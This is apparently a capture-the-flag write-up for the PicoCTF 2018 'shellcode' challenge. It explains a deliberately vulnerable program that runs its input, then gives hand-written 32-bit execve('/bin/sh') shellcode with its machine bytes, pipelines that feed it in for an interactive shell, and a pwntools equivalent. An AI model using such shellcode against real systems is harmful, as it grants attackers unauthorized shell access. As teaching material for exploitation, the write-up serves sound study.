PicoCTF 2018 - Shellcode

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

This one isn’t so much a bug as a giant, intentional, gaping hole:

char buf[BUFSIZE];

puts("Enter a string!");

// ...
gets(buf);
puts(buf);
// ...

puts("Thanks! Executing now...");

((void (*)())buf)();

Basically, the raw input is read until the first newline (0x0A) and stored in the buffer buf. We then attempt to call buf as if it were a function. This is a highly contrived example (a modern build would not mark the stack segment executable, so the program would segfault before ever running an instruction from buf). However, it is a beautiful blank canvas for us to learn how to hand-craft some shellcode.

Strategy

The strategy here is pretty simple: if we can fill buf with bytes that look like code, then that code will be executed.

The “classic” shellcode example is something like this (C99):

execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL});

But sometimes, you’ll see this written:

execve("/bin/sh", 0, 0);

Which will also work (on Linux only). The difference is that the first form passes a pointer to an array that contains a single NULL, while in the latter the pointer itself is NULL. Linux allows the latter, but strictly speaking the former is the correct way to invoke execve with an empty argv and envp.

If you can fill buf with the machine code corresponding to a call to execve like that, then the current program will be replaced with "/bin/sh" and you will have access to a shell. If you’re already sitting on some sweet shellcode, then go ahead and attempt /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server now.

Background Info

When compiling C code, execve is normally linked in from libc, but ultimately the call itself is performed by the kernel. In fact, the kernel has its own implementation of the execve function, and we can request that the kernel execute it by performing a system call. Exactly which system calls are available, and how you call them, varies by platform. For 32-bit x86 programs, the exact system calls available ultimately depend on your kernel sources, but there exist tables that have done the work for you and present everything in a simple way.

Looking for SYS_execve, we see that for 32-bit Linux systems the syscall number is 0x0b (11). This value goes into the eax register. Likewise, a pointer to the filename goes into ebx, a pointer to the argv[] array goes into ecx, and a pointer to the envp[] array goes into edx. On 32-bit x86 Linux, a system call can be requested by executing the “int 0x80” instruction, which is a software interrupt (number 0x80). NOTE: There are other methods of invoking a system call as well, including sysenter and vDSO, but the software interrupt is the simplest (and slowest) method.

We also note that we are executing buf directly, and that its value isn’t copied around first using something like strcpy or strdup. Therefore, we don’t have to worry about the buffer being truncated after nulls, because gets() itself will continue copying past any null bytes up to the first newline ('\n' == 0x0A). So the only “illegal” character that our shellcode must not contain is a newline.
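To make the difference concrete, here is a minimal Python sketch that mimics the two behaviors. The helper names read_like_gets and copy_like_strcpy are made up for illustration, and the sample bytes are arbitrary; this only models where each function stops, not the real libc implementations.

```python
def read_like_gets(stream: bytes) -> bytes:
    """Model of gets(): keep everything before the first newline (or all of it at EOF)."""
    return stream.split(b"\n", 1)[0]


def copy_like_strcpy(buf: bytes) -> bytes:
    """Model of strcpy(): keep everything before the first null byte."""
    return buf.split(b"\x00", 1)[0]


# Arbitrary sample input: a null byte in the middle, then a newline.
sample = b"\x68\x2f\x73\x68\x00\x90\x90\n ignored"

stored = read_like_gets(sample)
print(stored)                    # the null byte and what follows it survive gets()
print(copy_like_strcpy(stored))  # a strcpy() afterwards would have cut it short
```

If the challenge had passed buf through strcpy before calling it, null bytes would have been off limits too.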

Now that we have all the information we need, let’s craft some shellcode by hand. Here, I’ll be using nasm to assemble my assembly code (text) into machine code (binary bytes corresponding to opcodes).

; ~/exploit_shell.S

USE32 ; Directive for nasm to indicate this is 32 bit code

; execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL})

push 0x0068732f ; pushes bytes "/sh" + '\0' - but represented as a little-endian 32bit dword
push 0x6e69622f ; pushes bytes "/bin" - but represented as a little-endian 32bit dword
mov ebx, esp ; ebx = stack pointer, which points at the null-terminated byte sequence "/bin/sh"

xor eax, eax ; eax = 0
push eax ; push 0

mov al, 0x0b ; eax = 0x0b (SYS_execve)

mov ecx, esp ; ecx = stack pointer, which points at a 4 byte '0' (aka NULL)
mov edx, esp ; edx = stack pointer, which points at a 4 byte '0' (aka NULL)

int 0x80 ; syscall
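
If the two little-endian pushes look backwards to you, a quick sanity check in Python may help. This is just a sketch: push_imm32 is a hypothetical helper name, and it only models the bytes that a 32-bit push leaves in memory.

```python
import struct


def push_imm32(value: int) -> bytes:
    """Bytes that `push imm32` leaves on the stack, in memory order (little-endian)."""
    return struct.pack("<I", value)


# The stack grows downward, so the value pushed LAST sits at the LOWEST address.
# Reading memory upward from esp therefore gives the second push, then the first.
stack_memory = push_imm32(0x6e69622f) + push_imm32(0x0068732f)
print(stack_memory)
```

Reading upward from esp, the eight bytes spell out "/bin/sh" followed by the terminating null, which is exactly what ebx needs to point at.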

First off, let’s make sure it assembles, and see if the resulting machine code contains any “illegal” newlines:

$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i
  0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
  0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80

$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i | grep -c "0x0a"
0
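
The same check can be sketched in Python, which has the advantage of reporting where an offending byte sits. The function name bad_byte_offsets is made up for this example; the byte values are copied from the xxd output above.

```python
# Machine code copied from the xxd listing above.
shellcode = bytes([
    0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
    0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80,
])


def bad_byte_offsets(code: bytes, bad: bytes = b"\n"):
    """Return (offset, byte) pairs for every byte of `code` that appears in `bad`."""
    return [(offset, byte) for offset, byte in enumerate(code) if byte in bad]


print(bad_byte_offsets(shellcode))              # newline check, as with grep
print(bad_byte_offsets(shellcode, b"\x00\n"))   # what if nulls were illegal too?
```

The second call flags the null at offset 4, which is the last byte of the first push instruction.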

Yay! We’ve done it. We’ve constructed some machine code that should call execve, and it doesn’t contain any “illegal” chars. If it did contain illegal chars, we’d have to figure out exactly where they came from and come up with alternative assembly instructions to accomplish the same thing. For instance, if null bytes were illegal, we’d have to figure out how to change push 0x0068732f into something that didn’t contain a 0x00 when encoded. You might, for instance, do a push 0x0169722e followed by a xor dword [esp], 0x01010101 (nasm syntax; other assemblers spell it xor dword ptr [esp], 0x01010101) - which will result in 0x0068732f ending up on the stack as desired.
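
The arithmetic behind that trick is easy to check in Python. A small sketch, with has_null as a hypothetical helper name: XOR the value you want with a mask, push the result, then XOR the stack slot with the same mask to undo it. Neither the mask nor the encoded value may contain the illegal byte.

```python
import struct


def has_null(value: int) -> bool:
    """True if the 32-bit little-endian encoding of `value` contains a 0x00 byte."""
    return b"\x00" in struct.pack("<I", value)


target = 0x0068732f          # "/sh\0", contains a null byte
mask = 0x01010101            # mask used in the text above
encoded = target ^ mask      # the value we would push instead

print(hex(encoded))                                            # 0x169722e
print(has_null(target), has_null(mask), has_null(encoded))     # True False False
print(hex(encoded ^ mask))                                     # 0x68732f
```

XOR is its own inverse, so applying the mask a second time on the stack restores the original value.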

Exploitation

First, cd into the problem directory /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server. Now, at this point, you’d probably be tempted to do something like this (I know I was):

$ nasm -f bin ~/exploit_shell.S -o /dev/stdout | ./vuln
Enter a string!
h/sh
Thanks! Executing now...

Well - the good news is it didn’t crash. The bad news is it didn’t give us a shell. So… What happened?

I spent a bit of time debugging this before finally giving up and switching to pwntools (which we’ll go over in a minute). Now that I’ve come back to it, I can tell you exactly what happened: everything worked exactly the way we wrote it. The problem is that once the shellcode had been sent, there was no more input left for /bin/sh (the stream was at EOF), so the shell quit immediately. What you need is something that keeps writing to the pipe (and so to the shell’s stdin) after the shell launches. To prove that everything is working, you can run something like this:

$ (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && sleep 1 && echo ls) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
flag.txt  vuln  vuln.c

What this does is launch a series of commands in a subshell (that’s what the ‘(’ and ‘)’ are for). That series of commands writes out the shellcode, followed by a newline, then waits for 1 second (while /bin/sh starts), then it writes “ls”. That input is fed into the ./vuln program, which ends up turning into /bin/sh after the shellcode executes, which then prints out the content of the current directory after receiving the ls command.
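
The same two-step feed can be sketched in Python with nothing but the standard library. Treat this as an illustration under assumptions: feed_in_two_steps is a made-up name, and so that the example runs anywhere, it talks to a stand-in child process (a tiny Python script that reads one line and then echoes the rest of its input) rather than to ./vuln.

```python
import subprocess
import sys
import time


def feed_in_two_steps(argv, first_line: bytes, commands: bytes, delay: float = 0.2) -> bytes:
    """Send first_line plus a newline, pause, send commands, then return the child's output."""
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    proc.stdin.write(first_line + b"\n")   # the payload, terminated like `echo` does
    proc.stdin.flush()
    time.sleep(delay)                      # same role as `sleep 1` in the shell version
    proc.stdin.write(commands)             # input meant for whatever runs next
    proc.stdin.close()                     # EOF, so the child eventually exits
    output = proc.stdout.read()
    proc.wait()
    return output


# Stand-in child (an assumption for this demo): consume one line, echo the rest.
stand_in = [
    sys.executable, "-c",
    "import sys; sys.stdin.buffer.readline(); "
    "sys.stdout.buffer.write(sys.stdin.buffer.read())",
]
print(feed_in_two_steps(stand_in, b"payload-goes-here", b"ls\n"))
```

Against the real target you would pass ["./vuln"] as argv and the assembled shellcode bytes as first_line. The pause matters because the second write should only arrive once the first line has been consumed.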

Of course, that terminal still isn’t interactive. If you want one of those, you should do something like this:

$ cat - | (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && cat -) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{===REDACTED===}

BOOM! You’ve achieved an interactive terminal from handcrafted shellcode using nothing but an assembler.

Now that you’ve solved shellcode, head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.

Appendix - pwntools

We’ll go into pwntools more in future guides, but here’s a quick tease of how you might do this challenge with pwntools (using its built-in shellcode that is null and newline free):

$ python
Python 2.7.12 (default, Jul 21 2020, 15:19:50)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> p = process("./vuln")
[x] Starting local process './vuln'
[+] Starting local process './vuln': pid 2676856
>>> print(shellcraft.linux.sh().rstrip())
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80
>>> print(enhex(asm(shellcraft.linux.sh())))
6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80
>>> p.sendline(asm(shellcraft.linux.sh()))
>>> p.interactive()
[*] Switching to interactive mode
Enter a string!
jhh///sh/bin��h�4$ri1�QjY�Q��1�j
                                        X̀
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{===REDACTED===}